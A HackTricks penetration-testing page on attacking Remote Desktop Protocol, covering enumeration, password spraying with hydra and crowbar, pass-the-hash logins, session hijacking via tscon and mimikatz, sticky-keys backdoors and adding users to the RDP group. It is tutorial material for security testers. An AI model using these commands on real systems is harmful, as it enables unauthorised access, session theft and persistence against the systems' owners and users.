hacktricks/network-services-pentesting/pentesting-rdp.md

159 lines
6.9 KiB
Markdown
Raw Normal View History

2022-05-01 13:25:53 +00:00
# 3389 - Pentesting RDP
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
2022-10-03 20:20:19 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
2022-04-28 16:01:33 +00:00
</details>
2022-05-01 13:25:53 +00:00
## Basic Information
2022-04-28 16:01:33 +00:00
2022-05-01 13:25:53 +00:00
**Remote Desktop** Protocol (**RDP**) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs **RDP** client software for this purpose, while the other computer must run **RDP** server software (from [here](https://en.wikipedia.org/wiki/Remote\_Desktop\_Protocol)).
**Default port:** 3389
2022-05-01 13:25:53 +00:00
```
PORT STATE SERVICE
3389/tcp open ms-wbt-server
```
2022-10-03 20:20:19 +00:00
## Enumeration
### Automatic
```bash
2022-10-03 20:20:19 +00:00
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
```
2022-10-03 20:20:19 +00:00
It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).
2022-05-01 13:25:53 +00:00
### [Brute force](../generic-methodologies-and-resources/brute-force.md#rdp)
**Be careful, you could lock accounts**
2022-10-03 20:20:19 +00:00
### **Password Spraying**
2022-10-03 20:20:19 +00:00
**Be careful, you could lock accounts**
```bash
2022-10-03 20:20:19 +00:00
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
```
2022-10-03 20:20:19 +00:00
### Connect with known credentials/hash
```bash
2022-10-03 20:20:19 +00:00
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
```
2022-10-03 20:20:19 +00:00
### Check known credentials against RDP services
2022-10-03 09:49:04 +00:00
2022-10-03 20:20:19 +00:00
rdp\_check.py from impacket let you check if some credentials are valid for a RDP service:
```bash
2022-10-03 20:20:19 +00:00
rdp_check <domain>/<name>:<password>@<IP>
```
2022-10-03 20:20:19 +00:00
## **Attacks**
2022-10-03 20:20:19 +00:00
### Session stealing
With **SYSTEM permissions** you can access any **opened RDP session by any user** without need to know the password of the owner.
**Get openned sessions:**
2022-05-01 13:25:53 +00:00
```
query user
```
**Access to the selected session**
```bash
tscon <ID> /dest:<SESSIONNAME>
```
Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.
**Important**: When you access an active RDP sessions you will kickoff the user that was using it.
2022-05-01 13:25:53 +00:00
You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)
2022-05-01 13:25:53 +00:00
#### **Mimikatz**
You could also use mimikatz to do this:
```bash
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
```
2022-10-03 20:20:19 +00:00
### Sticky-keys & Utilman
Combining this technique with **stickykeys** or **utilman you will be able to access a administrative CMD and any RDP session anytime**
You can search RDPs that have been backdoored with one of these techniques already with: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
2022-10-03 20:20:19 +00:00
### RDP Process Injection
If someone from a different domain or with **better privileges login via RDP** to the PC where **you are an Admin**, you can **inject** your beacon in his **RDP session process** and act as him:
2022-08-16 00:18:24 +00:00
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
{% endcontent-ref %}
2022-10-03 20:20:19 +00:00
### Adding User to RDP group
```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```
2022-10-03 20:20:19 +00:00
## Shadow Attack
**AutoRDPwn** is a post-exploitation framework created in Powershell, designed primarily to automate the **Shadow** attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to **view his victim's desktop without his consent**, and even control it on demand, using tools native to the operating system itself.
{% embed url="https://github.com/JoelGMSec/AutoRDPwn" %}
2022-05-01 13:25:53 +00:00
## HackTricks Automatic Commands
2021-08-12 13:26:30 +00:00
2022-05-01 13:25:53 +00:00
```
2021-08-12 13:26:30 +00:00
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
2021-08-15 17:55:52 +00:00
Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software
https://book.hacktricks.xyz/pentesting/pentesting-rdp
Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
2021-08-12 13:26:30 +00:00
```
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
2022-10-03 20:20:19 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
2022-04-28 16:01:33 +00:00
</details>